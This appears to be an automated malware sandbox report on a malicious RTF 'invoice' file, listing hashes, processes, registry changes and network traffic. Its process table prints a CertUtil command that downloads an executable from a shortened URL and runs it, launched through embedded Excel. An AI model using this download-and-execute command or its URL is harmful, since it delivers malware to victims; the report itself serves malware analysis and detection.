| download: | invoice.doc |
| Full analysis: | https://app.any.run/tasks/8b76f303-71d0-4c2b-8697-16fd3d54b00e |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | July 11, 2019, 22:05:22 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/rtf |
| File info: | Rich Text Format data, version 1, unknown character set |
| MD5: | B1D48A8E5AA07F5D85C278410ABF79C5 |
| SHA1: | 56EFE973554A17AB1890BFF75892AAF6D58FA5AA |
| SHA256: | 3F01D5E66E5E0C20237FD0085CA47822A573896C22E025F601123842AFCEBE15 |
| SSDEEP: | 1536:VBsGXysETsy4LArDY7ojC+dRxo8EOViOg/wU42xuZXysETsy4LArDY7ojC+dRxoz:Vl3c8Y5c8Y5c8Y5c8YfU |
MALICIOUS
Starts CMD.EXE for commands execution
- EXCEL.EXE (PID: 2388)
- EXCEL.EXE (PID: 2304)
- EXCEL.EXE (PID: 3648)
- EXCEL.EXE (PID: 2980)
Starts CertUtil for downloading files
- cmd.exe (PID: 3776)
- cmd.exe (PID: 2884)
- cmd.exe (PID: 968)
- cmd.exe (PID: 3896)
Unusual execution from Microsoft Office
- EXCEL.EXE (PID: 2388)
- EXCEL.EXE (PID: 2304)
- EXCEL.EXE (PID: 3648)
- EXCEL.EXE (PID: 2980)
SUSPICIOUS
Executed via COM
- EXCEL.EXE (PID: 2388)
- EXCEL.EXE (PID: 2304)
- EXCEL.EXE (PID: 3648)
- EXCEL.EXE (PID: 2980)
- excelcnv.exe (PID: 3080)
Creates files in the user directory
- certutil.exe (PID: 3384)
INFO
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 3268)
- EXCEL.EXE (PID: 2388)
- EXCEL.EXE (PID: 2304)
- EXCEL.EXE (PID: 3648)
- EXCEL.EXE (PID: 2980)
- WINWORD.EXE (PID: 3608)
- excelcnv.exe (PID: 3080)
- WINWORD.EXE (PID: 3332)
Creates files in the user directory
- WINWORD.EXE (PID: 3268)
- WINWORD.EXE (PID: 3608)
Manual execution by user
- WINWORD.EXE (PID: 3608)
- WINWORD.EXE (PID: 3332)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .rtf | | | Rich Text Format (100) |
|---|
EXIF
RTF
| Author: | Windows User |
|---|---|
| LastModifiedBy: | Windows User |
| CreateDate: | 2019:02:12 18:12:00 |
| ModifyDate: | 2019:02:12 18:12:00 |
| RevisionNumber: | 2 |
| TotalEditTime: | 1 minute |
| Pages: | 5 |
| Words: | 68 |
| Characters: | 393 |
| CharactersWithSpaces: | 460 |
| InternalVersionNumber: | 85 |
Total processes
55
Monitored processes
16
Malicious processes
8
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 920 | certutil -urlcache -split -f http://bit.ly/30xnuAq 0989434.exe | C:\Windows\system32\certutil.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 2147954557 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 968 | cmd.exe /ccertutil -urlcache -split -f http://bit.ly/30xnuAq 0989434.exe& 0989434.exe | C:\Windows\system32\cmd.exe | — | EXCEL.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2304 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2388 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2884 | cmd.exe /ccertutil -urlcache -split -f http://bit.ly/30xnuAq 0989434.exe& 0989434.exe | C:\Windows\system32\cmd.exe | — | EXCEL.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2980 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3080 | "C:\Program Files\Microsoft Office\Office14\excelcnv.exe" -Embedding | C:\Program Files\Microsoft Office\Office14\excelcnv.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3268 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\invoice.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3332 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\formasked.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3384 | certutil -urlcache -split -f http://bit.ly/30xnuAq 0989434.exe | C:\Windows\system32\certutil.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 2147954557 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
3 719
Read events
2 610
Write events
1 054
Delete events
55
Modification events
| (PID) Process: | (3268) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | }u9 |
Value: 7D753900C40C0000010000000000000000000000 | |||
| (PID) Process: | (3268) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (3268) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (3268) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1324023838 | |||
| (PID) Process: | (3268) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1324023952 | |||
| (PID) Process: | (3268) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1324023953 | |||
| (PID) Process: | (3268) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: C40C00004E2298C73438D50100000000 | |||
| (PID) Process: | (3268) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | 6v9 |
Value: 36763900C40C000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (3268) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | 6v9 |
Value: 36763900C40C000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (3268) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
Executable files
0
Suspicious files
0
Text files
7
Unknown types
12
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3268 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD97D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2388 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE295.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2304 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE813.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3648 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVREB30.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2980 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVREE0F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3080 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\CVRF274.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3080 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\~DF60C65D3FFAD5CA4F.TMP | — | |
MD5:— | SHA256:— | |||
| 3268 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF0EC2F9414C5EB653.TMP | — | |
MD5:— | SHA256:— | |||
| 3080 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\~DF1E7E27D63503D663.TMP | — | |
MD5:— | SHA256:— | |||
| 3268 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFA9DD1EFEB90A2554.TMP | — | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
32
DNS requests
2
Threats
8
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3720 | certutil.exe | GET | 301 | 67.199.248.11:80 | http://bit.ly/30xnuAq | US | html | 128 b | shared |
3384 | certutil.exe | GET | 301 | 67.199.248.11:80 | http://bit.ly/30xnuAq | US | html | 128 b | shared |
3384 | certutil.exe | GET | 301 | 67.199.248.11:80 | http://bit.ly/30xnuAq | US | html | 128 b | shared |
3720 | certutil.exe | GET | 301 | 67.199.248.11:80 | http://bit.ly/30xnuAq | US | html | 128 b | shared |
920 | certutil.exe | GET | 301 | 67.199.248.11:80 | http://bit.ly/30xnuAq | US | html | 128 b | shared |
3584 | certutil.exe | GET | 301 | 67.199.248.11:80 | http://bit.ly/30xnuAq | US | html | 128 b | shared |
920 | certutil.exe | GET | 301 | 67.199.248.11:80 | http://bit.ly/30xnuAq | US | html | 128 b | shared |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3584 | certutil.exe | 67.199.248.11:80 | bit.ly | Bitly Inc | US | shared |
3384 | certutil.exe | 23.99.183.149:443 | compute-1.azurewebsites.net | Microsoft Corporation | US | suspicious |
3720 | certutil.exe | 67.199.248.11:80 | bit.ly | Bitly Inc | US | shared |
3720 | certutil.exe | 23.99.183.149:443 | compute-1.azurewebsites.net | Microsoft Corporation | US | suspicious |
920 | certutil.exe | 23.99.183.149:443 | compute-1.azurewebsites.net | Microsoft Corporation | US | suspicious |
920 | certutil.exe | 67.199.248.11:80 | bit.ly | Bitly Inc | US | shared |
3584 | certutil.exe | 23.99.183.149:443 | compute-1.azurewebsites.net | Microsoft Corporation | US | suspicious |
3384 | certutil.exe | 67.199.248.11:80 | bit.ly | Bitly Inc | US | shared |
DNS requests
Domain | IP | Reputation |
|---|---|---|
bit.ly |
| shared |
compute-1.azurewebsites.net |
| malicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
3384 | certutil.exe | Misc activity | SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request |
3720 | certutil.exe | Misc activity | SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request |
920 | certutil.exe | Misc activity | SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request |
3584 | certutil.exe | Misc activity | SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request |
4 ETPRO signatures available at the full report